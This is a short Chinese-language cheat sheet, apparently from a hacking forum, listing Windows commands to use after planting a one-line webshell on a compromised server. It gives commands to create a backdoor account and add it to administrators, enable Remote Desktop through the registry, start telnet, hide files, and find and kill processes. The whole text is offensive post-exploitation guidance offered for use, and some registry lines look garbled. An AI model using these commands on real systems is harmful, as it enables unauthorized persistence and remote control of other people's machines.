一句话木马植入之后可能就需要用上下面的命令提权了
其实有很多提权工具,如上大马,CMD.exe等等。
但是没时间去检测这些写的工具的后门。
个人感觉还是直接敲命令直接。保险
ipconfig 显示本地IP地址
net start telnet 开telnet服务
net user 查看所有用户列表
net user xiaoma xiaoma /add 添加用户xiaoma密码为xiaoma
net user xiaoma /del 删除xiaoma用户
net localgroup administrators xiaoma /add 将帐号xiaoma升级为管理员
attrib 隐藏文件
开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
关3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f
查终端端口
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
tasklist /svc 有关进程PID
netstat -an|findstr “[ports] “查看有关进程PID
tasklist |findstr “[PID] “根据PID查找进程
taskkill /f /t /im 关闭进程